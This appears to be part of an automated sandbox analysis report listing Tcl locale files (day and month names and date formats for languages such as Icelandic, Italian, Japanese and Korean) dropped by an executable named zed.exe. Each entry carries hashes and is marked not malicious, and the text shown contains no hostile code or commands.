                                                                                                                                                                                                                                            SSDEEP:24:4aR83XVhVTeMVHGPbfXSmWzaZlfFxUQbW1U6ZY95n123etvmv3eTn:43Xz0b/uzaZtXUMw8n
                                                                                                                                                                                                                                            MD5:ACF0452D5BB6D36A40061D2B0AF4D7A6
                                                                                                                                                                                                                                            SHA1:9DF4D88F1962A672EFBDDE524550F7A5D02D446D
                                                                                                                                                                                                                                            SHA-256:778BE3D6BFE2DFFB64FF1AFB9EC8351A3343B314CF93A68E8F7FD1073EE122BB
                                                                                                                                                                                                                                            SHA-512:34CC02D7D28B5E161ED10250C214375561FD3D00979BFB8BCF3DB72A81BD9B7C225301528B400F7C54D8B6379F772EB6477D5D03F2CF7DC4DD19D22AEEC151B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset is DAYS_OF_WEEK_ABBREV [list \.. "sun."\.. "m\u00e1n."\.. "\u00feri."\.. "mi\u00f0."\.. "fim."\.. "f\u00f6s."\.. "lau."].. ::msgcat::mcset is DAYS_OF_WEEK_FULL [list \.. "sunnudagur"\.. "m\u00e1nudagur"\.. "\u00feri\u00f0judagur"\.. "mi\u00f0vikudagur"\.. "fimmtudagur"\.. "f\u00f6studagur"\.. "laugardagur"].. ::msgcat::mcset is MONTHS_ABBREV [list \.. "jan."\.. "feb."\.. "mar."\.. "apr."\.. "ma\u00ed"\.. "j\u00fan."\.. "j\u00fal."\.. "\u00e1g\u00fa."\.. "sep."\.. "okt."\.. "n\u00f3v."\.. "des."\.. ""].. ::msgcat::mcset is MONTHS_FULL [list \.. "jan\u00faar"\.. "febr\u00faar"\.. "mars"\.. "apr\u00edl"\.. "ma\u00ed"\.. "j\u00fan\u00ed"\.. "j\u00fal\
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1294
                                                                                                                                                                                                                                            Entropy (8bit):4.282101355195382
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83JYEVI2vfYpQjAOnhWBIIsmdC2lkOKk+Z+FoPJ6G3vesvY:43JZVB8eAOnh4IzR2+J6G/eKY
                                                                                                                                                                                                                                            MD5:3354A6FC06C298E33AA14163929E56EB
                                                                                                                                                                                                                                            SHA1:C3005370DAE8A266AE21F7E2B871AEA5A656A155
                                                                                                                                                                                                                                            SHA-256:1D72170B9F9028A237364F7CD7EA8B48BD4770E61922205CE862300103B13DE5
                                                                                                                                                                                                                                            SHA-512:58B64D4F5827CA2A1BF2DDFD1F7EFDDBBD46709A6A9B7277E8EB386D80043A87ADDE2B3D5A49A934E8EB8F797BD735FADA1D22AD3DD856FFE9507F71B9E45CBA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset it DAYS_OF_WEEK_ABBREV [list \.. "dom"\.. "lun"\.. "mar"\.. "mer"\.. "gio"\.. "ven"\.. "sab"].. ::msgcat::mcset it DAYS_OF_WEEK_FULL [list \.. "domenica"\.. "luned\u00ec"\.. "marted\u00ec"\.. "mercoled\u00ec"\.. "gioved\u00ec"\.. "venerd\u00ec"\.. "sabato"].. ::msgcat::mcset it MONTHS_ABBREV [list \.. "gen"\.. "feb"\.. "mar"\.. "apr"\.. "mag"\.. "giu"\.. "lug"\.. "ago"\.. "set"\.. "ott"\.. "nov"\.. "dic"\.. ""].. ::msgcat::mcset it MONTHS_FULL [list \.. "gennaio"\.. "febbraio"\.. "marzo"\.. "aprile"\.. "maggio"\.. "giugno"\.. "luglio"\.. "agosto"\.. "settembre"\.. "ottobre"\.. "novembre"\.. "dicembre"\.. "
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):250
                                                                                                                                                                                                                                            Entropy (8bit):4.8982877714191035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoi5jL/oyJ+3v1oia+3vjLtAsvn:4EnLB383b3F+3vV3v3tnn
                                                                                                                                                                                                                                            MD5:E4400C16406A46C2880250522BED2EDE
                                                                                                                                                                                                                                            SHA1:787A04037A355FF845025B8865335EB938280BFB
                                                                                                                                                                                                                                            SHA-256:24B5F303F5C7AF6F63FDC23ADB4D713087AE74B6D18C117D787AF03374C5F57E
                                                                                                                                                                                                                                            SHA-512:3551DEEF0EAAC66042143F77F2F4DD9154764F35BD624DAB3C9F0F59F3489CA39CE34BC2A69BC5BFBB1926C6F5C39D74A806ECB1A47F6B374101071957FD417B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset it_CH DATE_FORMAT "%e. %B %Y".. ::msgcat::mcset it_CH TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset it_CH DATE_TIME_FORMAT "%e. %B %Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1689
                                                                                                                                                                                                                                            Entropy (8bit):4.951012555106795
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83Gl84OCtnbf3wvtMwvLv4GTwhvevTwSoXghGhD6h:43FULWttbdEVoES8gshD6h
                                                                                                                                                                                                                                            MD5:11FBE427747012444AEEAFD6134034A4
                                                                                                                                                                                                                                            SHA1:58C72C432053264EAE6335D6CC93C5FFA33C42B8
                                                                                                                                                                                                                                            SHA-256:2B6D15A191437F1B84FA7023E34153B61E6BF1DE1452EA921E9CCBBE5D4BEB1C
                                                                                                                                                                                                                                            SHA-512:4F993BDF5D50D6D9F7410C83D226FEF30BA8C989F9977A7025C36BE22CEECCD6C68CDD6AFC5C9CE3D700559C4EDC619042E14DD88EE7583B9D5AA66F0268FD23
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ja DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u6708"\.. "\u706b"\.. "\u6c34"\.. "\u6728"\.. "\u91d1"\.. "\u571f"].. ::msgcat::mcset ja DAYS_OF_WEEK_FULL [list \.. "\u65e5\u66dc\u65e5"\.. "\u6708\u66dc\u65e5"\.. "\u706b\u66dc\u65e5"\.. "\u6c34\u66dc\u65e5"\.. "\u6728\u66dc\u65e5"\.. "\u91d1\u66dc\u65e5"\.. "\u571f\u66dc\u65e5"].. ::msgcat::mcset ja MONTHS_FULL [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"].. ::msgcat::mcset ja BCE "\u7d00\u5143\u524d".. ::msgcat::mcset ja CE "\u897f\u66a6".. ::msgcat::mcset ja AM "\u5348\u524d".. ::msgcat::mcset ja PM "\u5348\u5f8c".. ::ms
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1025
                                                                                                                                                                                                                                            Entropy (8bit):4.097746630492712
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83E7XIE/OWbjH3Tw2PzJrIsmZ5maAXaMHPB:43WlrraA/vB
                                                                                                                                                                                                                                            MD5:2F79804667D6F8C77BB188D59EF5F3DF
                                                                                                                                                                                                                                            SHA1:10950ECA798F24A7C405B3E18B559CCC0C056EC1
                                                                                                                                                                                                                                            SHA-256:96FF17F1CFF976E4E204D3616D1EFCED4D0F907C5E6A0F04B4536CB4AD1190C9
                                                                                                                                                                                                                                            SHA-512:1B8ADC3B7FF920F8F53A17BFCC7EA24A0F8E276A42E5C63F9880DAE9B74E12716DD12DB647A80A9D99294449146C643EC58A33B03681AA4FA26A5FBC508C248C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kl DAYS_OF_WEEK_ABBREV [list \.. "sab"\.. "ata"\.. "mar"\.. "pin"\.. "sis"\.. "tal"\.. "arf"].. ::msgcat::mcset kl DAYS_OF_WEEK_FULL [list \.. "sabaat"\.. "ataasinngorneq"\.. "marlunngorneq"\.. "pingasunngorneq"\.. "sisamanngorneq"\.. "tallimanngorneq"\.. "arfininngorneq"].. ::msgcat::mcset kl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset kl MONTHS_FULL [list \.. "januari"\.. "februari"\.. "martsi"\.. "aprili"\.. "maji"\.. "juni"\.. "juli"\.. "augustusi"\.. "septemberi"\.. "oktoberi"\.. "novemberi"\.. "dece
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.882476709336307
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoEpb53FuoEpLE3vLjoEpLE3v6mjoEpba+3vnFDoAkvn:4EnLB383jF3Fyw3vxw3v6A/3v9dmn
                                                                                                                                                                                                                                            MD5:255830678C8724E65C05A7E020E68B5B
                                                                                                                                                                                                                                            SHA1:0AEA48AB0439C04F92B5CA9A3B5182718B7F116B
                                                                                                                                                                                                                                            SHA-256:3027CFE9EBD2172CEFC15C025786CAD47A6E2894BF0474AFC1B0C341E70202AA
                                                                                                                                                                                                                                            SHA-512:99039FFA7269DD136D1693121E261DB5586E86EC401D2B1EB8FB1D13A9A7F1E514D9FC941B838286B986C02ED281828ED67E59002D837E350A64F4832340516A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kl_GL DATE_FORMAT "%d %b %Y".. ::msgcat::mcset kl_GL TIME_FORMAT "%T".. ::msgcat::mcset kl_GL TIME_FORMAT_12 "%T".. ::msgcat::mcset kl_GL DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1621
                                                                                                                                                                                                                                            Entropy (8bit):4.612163420716489
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43fMlylslXlslxl1hVuqLGuqqntH4xUyw9:2fKYqVq3f
                                                                                                                                                                                                                                            MD5:CCB2C2254D3FA3025183DB7E010CAD66
                                                                                                                                                                                                                                            SHA1:510BBB6A9162F2EF908E6561CC714848C2EA74CA
                                                                                                                                                                                                                                            SHA-256:EF6FB319C398EEA79B3A951319F831F3B186D556565D17D738E5F9B4B77570F2
                                                                                                                                                                                                                                            SHA-512:A0264565899BD1B0783ADC0388F893CCE713ADB23BDD63907CF092A74ACB4F7D3BE09DA29801E9C11A7B08CB1706E3771C598ACED351A0FCCBF4EBBD7871148D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ko DAYS_OF_WEEK_ABBREV [list \.. "\uc77c"\.. "\uc6d4"\.. "\ud654"\.. "\uc218"\.. "\ubaa9"\.. "\uae08"\.. "\ud1a0"].. ::msgcat::mcset ko DAYS_OF_WEEK_FULL [list \.. "\uc77c\uc694\uc77c"\.. "\uc6d4\uc694\uc77c"\.. "\ud654\uc694\uc77c"\.. "\uc218\uc694\uc77c"\.. "\ubaa9\uc694\uc77c"\.. "\uae08\uc694\uc77c"\.. "\ud1a0\uc694\uc77c"].. ::msgcat::mcset ko MONTHS_ABBREV [list \.. "1\uc6d4"\.. "2\uc6d4"\.. "3\uc6d4"\.. "4\uc6d4"\.. "5\uc6d4"\.. "6\uc6d4"\.. "7\uc6d4"\.. "8\uc6d4"\.. "9\uc6d4"\.. "10\uc6d4"\.. "11\uc6d4"\.. "12\uc6d4"\.. ""].. ::msgcat::mcset ko MONTHS_FULL [list \.. "1\uc6d4"\.. "2\uc6d4"\.. "3\uc6d4"\.. "4\uc6d4"\.. "5\uc6d4"\.. "6\uc6d4"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):354
                                                                                                                                                                                                                                            Entropy (8bit):5.058233326545794
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo56SFZhjAo56m5Ys5o56TGMovBo56a/W3v6mfKo56TT+3+:4EnLB383g62vjV6m5Ysg6TG26a+3v6oo
                                                                                                                                                                                                                                            MD5:58CA45CE26AF8ECA729BA72898BB633D
                                                                                                                                                                                                                                            SHA1:CBBEDB7370890A1DB65080A359A9A5C164B525D5
                                                                                                                                                                                                                                            SHA-256:4CAC8FB43D290A63A4D3215F22228B358AB4FA174F08712DD6C5B64C5E485071
                                                                                                                                                                                                                                            SHA-512:48CCBD3F7B96D0998B6D1A1F8D7FE2B4B070BB5B8809FABE0A38209AEAF2E95E098292A5B9B5F0954E7729708A2173D32AAD70B6C0F336DB1E9BFA2968E6A56B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ko_KR BCE "\uae30\uc6d0\uc804".. ::msgcat::mcset ko_KR CE "\uc11c\uae30".. ::msgcat::mcset ko_KR DATE_FORMAT "%Y.%m.%d".. ::msgcat::mcset ko_KR TIME_FORMAT_12 "%P %l:%M:%S".. ::msgcat::mcset ko_KR DATE_TIME_FORMAT "%Y.%m.%d %P %l:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1997
                                                                                                                                                                                                                                            Entropy (8bit):4.202940482570495
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83cm48Vc7VczMmDNVcYVcR0prdSmS68FeDJVcYVcR0prdSmS68FeuT:4354a+0prjS68mq0prjS68pT
                                                                                                                                                                                                                                            MD5:67FA08F588A3B44D67E42EC1025013BC
                                                                                                                                                                                                                                            SHA1:6895FEF0476DE0349895DB052B335AC46636B23A
                                                                                                                                                                                                                                            SHA-256:9D215E31A39FED45B3657144E5F73C942E59E500036CE16B1FFF201FD6358595
                                                                                                                                                                                                                                            SHA-512:4C2708BD9DD98320D3133EEFFD19A8018F49A36AB8348DB7C0B0287ADB4C052D3EFAD3686C8E46E0520F3CE27F361978272BA8752EB04E5A7BC07780398480DB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kok DAYS_OF_WEEK_FULL [list \.. "\u0906\u0926\u093f\u0924\u094d\u092f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u093e\u0930"\.. "\u092c\u0941\u0927\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset kok MONTHS_ABBREV [list \.. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\.. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u090f\u092a\u094d\u0930\u093f\u0932"\.. "\u092e\u0947"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u0948"\.. "\u0913\u0917\u0938\u094d\u091f"\.. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\.. "\u0913\u0915\u094d\
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):260
                                                                                                                                                                                                                                            Entropy (8bit):4.904340548436718
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo5VsNv+IZo5VsU3v6ry/5o5VsNo+3v+6f6HyFvn:4EnLB383gVsNvlAVsU3v6ry/gVsNF3vj
                                                                                                                                                                                                                                            MD5:0AA20289A63BA3A14DCFED75EED980DE
                                                                                                                                                                                                                                            SHA1:2B76013593D886B0724D82849FD1840B20922902
                                                                                                                                                                                                                                            SHA-256:644F2B6D4BA27AF14891B781DEF60F708A9F18FC2F73566649B631A6DEA3EF09
                                                                                                                                                                                                                                            SHA-512:6E13E0DC8BFD2ABE0D04B0BC098C40972F088F8D3D6ACA00338B17473ABC6F69840A88EC0C965C493B4270DEC777A0EA2D762BC33044EFE7030E437604EE201B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kok_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset kok_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset kok_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1013
                                                                                                                                                                                                                                            Entropy (8bit):4.060027087416375
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83no1UwRlw4MAwBdc//3rpF6HFoot8:43vglHM7MTCHFs
                                                                                                                                                                                                                                            MD5:CCEC7B77DCA1F6A406311FC43EE57030
                                                                                                                                                                                                                                            SHA1:4ED329BB09A8F7C67F8984CD790E9B6819DE6F00
                                                                                                                                                                                                                                            SHA-256:EAB468AC5BF1833D4F8CD658789413D4A46CAD16B63FB9B906CFF6DC9EA26251
                                                                                                                                                                                                                                            SHA-512:4EFF6E49CC479A1BF0CEEAE256A1FAE7D4AE7D0ACE23CD87851471EC96BB5AF580C58A142E1B6CE72BC8B6BFF946A38801E681443B7DD9527A1DEB6E7EDD7D22
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kw DAYS_OF_WEEK_ABBREV [list \.. "Sul"\.. "Lun"\.. "Mth"\.. "Mhr"\.. "Yow"\.. "Gwe"\.. "Sad"].. ::msgcat::mcset kw DAYS_OF_WEEK_FULL [list \.. "De Sul"\.. "De Lun"\.. "De Merth"\.. "De Merher"\.. "De Yow"\.. "De Gwener"\.. "De Sadorn"].. ::msgcat::mcset kw MONTHS_ABBREV [list \.. "Gen"\.. "Whe"\.. "Mer"\.. "Ebr"\.. "Me"\.. "Evn"\.. "Gor"\.. "Est"\.. "Gwn"\.. "Hed"\.. "Du"\.. "Kev"\.. ""].. ::msgcat::mcset kw MONTHS_FULL [list \.. "Mys Genver"\.. "Mys Whevrel"\.. "Mys Merth"\.. "Mys Ebrel"\.. "Mys Me"\.. "Mys Evan"\.. "Mys Gortheren"\.. "Mye Est"\.. "Mys Gwyngala"\.. "Mys Hedra"\.. "Mys Du"\.. "Mys Kevardhu"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.959913054070712
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoh6AvMoh633v6ay/5oh6Ao+3vR6HyFvn:4EnLB38346AvR633v6ay/46AF3voSVn
                                                                                                                                                                                                                                            MD5:18E8576F63B978F1AFEF15AC57B44FBF
                                                                                                                                                                                                                                            SHA1:D50EB90944FF81E3CBFF942B16C1874EB7EA2562
                                                                                                                                                                                                                                            SHA-256:EDAC14D929D1C6559EC46E9B460F8F44A189B78FB915F2D641104549CBD94188
                                                                                                                                                                                                                                            SHA-512:F3DE5EE77BB889DA1353F9C9A1811083AB28BBEE4B7D6C8782F38B1AE44CF77565371A0E18F7E2BACD7EF590BC1215CA3E41AF929A15F60B3E85F6099A4CF378
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kw_GB DATE_FORMAT "%d %B %Y".. ::msgcat::mcset kw_GB TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset kw_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1307
                                                                                                                                                                                                                                            Entropy (8bit):4.506235846178408
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83iHYuAMLzHYCaNu3d3nT15T31FhAlDgK/YrDZ/6Qz2C9kGPCveksvc:43iHFnHuUd3/T3xM/+SQCC9kGPEekKc
                                                                                                                                                                                                                                            MD5:D4EC2E96995E0EB263F338DD16CC4F8D
                                                                                                                                                                                                                                            SHA1:7ED86175489B1AE3CA5C0E8D42969F951C895D6B
                                                                                                                                                                                                                                            SHA-256:855B652FCC8066BA45C7DC8DBFD3807D1B4759EA8D71C523567F47BF445D1DE6
                                                                                                                                                                                                                                            SHA-512:A55E0D759A22360FF6668CEFAFFB812BABB316C447ADDB1FD5CDBC06AE1DA2E891E09952D073164C013AD9BF4184614102E7ADA553EEEFB2BBA26208B79B277F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset lt DAYS_OF_WEEK_ABBREV [list \.. "Sk"\.. "Pr"\.. "An"\.. "Tr"\.. "Kt"\.. "Pn"\.. "\u0160t"].. ::msgcat::mcset lt DAYS_OF_WEEK_FULL [list \.. "Sekmadienis"\.. "Pirmadienis"\.. "Antradienis"\.. "Tre\u010diadienis"\.. "Ketvirtadienis"\.. "Penktadienis"\.. "\u0160e\u0161tadienis"].. ::msgcat::mcset lt MONTHS_ABBREV [list \.. "Sau"\.. "Vas"\.. "Kov"\.. "Bal"\.. "Geg"\.. "Bir"\.. "Lie"\.. "Rgp"\.. "Rgs"\.. "Spa"\.. "Lap"\.. "Grd"\.. ""].. ::msgcat::mcset lt MONTHS_FULL [list \.. "Sausio"\.. "Vasario"\.. "Kovo"\.. "Baland\u017eio"\.. "Gegu\u017e\u0117s"\.. "Bir\u017eelio"\.. "Liepos"\.. "Rugpj\u016b\u010dio"\.. "Rugs\u0117jo"\.. "Spa
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1271
                                                                                                                                                                                                                                            Entropy (8bit):4.460631492946299
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83Amshb4mZdA7nl9kMmfpK269rkbi5vWm0W9ARivirXsv05vkn:430bHA7XRr95QWQQgaKkn
                                                                                                                                                                                                                                            MD5:554ED2CAFD25F5F82DA54AE057F4BA98
                                                                                                                                                                                                                                            SHA1:E25CDF0F9C4B523B5B05408E7820F7B4F627D19E
                                                                                                                                                                                                                                            SHA-256:7E90D2008B220DB19C796C7107AD69D263B8AC8C7BDDFB879230699D978E9A0A
                                                                                                                                                                                                                                            SHA-512:612201CCD64A51EC943921196D8C74D8BCA3AB3E35B0C9E91AE7F3A6B36F4F255AA9ADB3A254EC03629B01BD221B0B3F8CC4DFBFAC1F1718775E81CAD188AA86
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset lv DAYS_OF_WEEK_ABBREV [list \.. "Sv"\.. "P"\.. "O"\.. "T"\.. "C"\.. "Pk"\.. "S"].. ::msgcat::mcset lv DAYS_OF_WEEK_FULL [list \.. "sv\u0113tdiena"\.. "pirmdiena"\.. "otrdiena"\.. "tre\u0161diena"\.. "ceturdien"\.. "piektdiena"\.. "sestdiena"].. ::msgcat::mcset lv MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maijs"\.. "J\u016bn"\.. "J\u016bl"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset lv MONTHS_FULL [list \.. "janv\u0101ris"\.. "febru\u0101ris"\.. "marts"\.. "apr\u012blis"\.. "maijs"\.. "j\u016bnijs"\.. "j\u016blijs"\.. "augusts"\.. "septembris"\.. "oktobris"\.. "novembris"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2157
                                                                                                                                                                                                                                            Entropy (8bit):4.299300188052441
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:4389QMsGqdQfRQPjQmofqJp9sk5BstSpWQiQ3QJQ5QL39I0QRQTQ8Ql4J8W:2W8SMq+9sWINi2Kc9I0+gXF
                                                                                                                                                                                                                                            MD5:888014F13A82511ABEF99497A753BFC3
                                                                                                                                                                                                                                            SHA1:7F4231BEDE191370B37E8B917B6AD8829D15CA7D
                                                                                                                                                                                                                                            SHA-256:4C0EB07F0FCB36DD12A3F7EDD6531616611ABF62BF7705B5A37CC59098221D5D
                                                                                                                                                                                                                                            SHA-512:D748127CC615584901D35B6492EC566448B6C4DA6363858B5145921E9CD09490355CF4315F0F7A8542AA12790CD3432011A643A3A8F74B0119DB0DCE19FD68A4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0435\u0434."\.. "\u043f\u043e\u043d."\.. "\u0432\u0442."\.. "\u0441\u0440\u0435."\.. "\u0447\u0435\u0442."\.. "\u043f\u0435\u0442."\.. "\u0441\u0430\u0431."].. ::msgcat::mcset mk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0435\u043b\u0430"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0440\u0442\u043e\u043a"\.. "\u043f\u0435\u0442\u043e\u043a"\.. "\u0441\u0430\u0431\u043e\u0442\u0430"].. ::msgcat::mcset mk MONTHS_ABBREV [list \.. "\u0458\u0430\u043d."\.. "\u0444\u0435\u0432."\.. "\u043c\u0430\u0440."\.. "\u0430\u043f\u0440."\.. "\u043c\u0430\u0458."\.. "\u0458\u0443\u
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1846
                                                                                                                                                                                                                                            Entropy (8bit):4.220147808639664
                                                                                                                                                                                                                                            Encrypted:false
